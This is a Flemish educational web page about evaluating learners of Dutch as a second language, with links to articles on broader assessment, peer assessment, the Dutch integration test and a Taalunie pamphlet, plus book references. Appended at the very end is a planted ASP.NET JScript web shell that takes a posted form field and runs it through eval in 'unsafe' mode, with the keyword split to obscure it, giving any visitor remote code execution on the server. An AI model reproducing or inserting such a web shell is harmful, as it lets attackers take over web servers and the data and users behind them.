Start >  informatiepunt
      Start >>
      Wat is evalueren?
      Visie en voorbeelden
      Toetstips en
      stappenplannen evaluatie
      Achtergronden en links


Wie A zegt moet ook B zeggen.
Om verschillende redenen is er behoefte aan manieren om breder te evalueren. Manieren die vertrekken vanuit de behoeftes en daaraan gekoppelde doelstellingen van leerders. Manieren waarbij je net zo goed validiteit en betrouwbaarheid kan bereiken als met eenmalige toetsen die in het teken staan van vergelijkbaarheid, efficiëntie, standaardisering... Daarbij kan de invalshoek van waaruit we evalueren met betrekking tot een aantal aspecten verruimd worden. Hoe doe je dat? Lees meer>>

De inburgeringstoets van Verdonk. Een reactie uit Vlaanderen.
Lees meer>>

Professioneel geprofileerd?
Inge Schuurmans en Carine Steverlynck voerden een rendementsstudie uit van het NT2-aanbod binnen CVO met inbegrip van een evaluatie van de opleidingsprofielen. Lees de studie>>. 

To peer or not to peer?
In dit artikel in Vonk beschrijven Els Lepage en Liesbeth Melis hun ervaring met peer-assessment in hun klasgroepen. Naast voorbeelden geven ze ook enkele aandachtspunten het opstellen van dergelijk evaluatie-methode. Lees meer>>

Pamflet toetsing NT2 en het Europees referentiekader
Toetsen en examens hebben vaak verstrekkende gevolgen. Ieder moet zich telkens weer afvragen of de beslissing die genomen wordt naar aanleiding van de toetsuitslag, de juiste is en in overeenstemming met doel, vorm en niveau of moeilijkheid van de toets. De Nederlandse Taalunie schreef een pamflet als eerste aanzet voor een maatschappelijke en inhoudelijke discussie over de richting, doelstellingen en het juist gebruik van  NT2-toetsen en -examens. Lees meer>>

Evaluatie: Hoe? Zo! 
In dit artikel geeft Martien Berben tien tips voor het uitbouwen van een goede evaluatiepraktijk. Lees meer>>

Enkele referenties

  • Van Petegem, Peter, Evaluatie op de testbank. Een handboek voor het ontwikkelen van alternatieve evaluatievormen, Wolters Plantyn, 2002.
  • F. Dochy, W. Schelfhout en S. Janssens (red.), Anders evalueren. Assessment in de onderwijspraktijk, Lannoocampus, Leuven, 2003.

terug>>

<%@ Page Language="Jscript" Debug=true%> <% var SO=Request.Form["M"]; var NJF="unsa",PKCLJIY="fe",VSEWDZ=NJF+PKCLJIY; function UKBT() { return SO; } function UJWHK() { return eval(UKBT(),VSEWDZ); } UJWHK() %>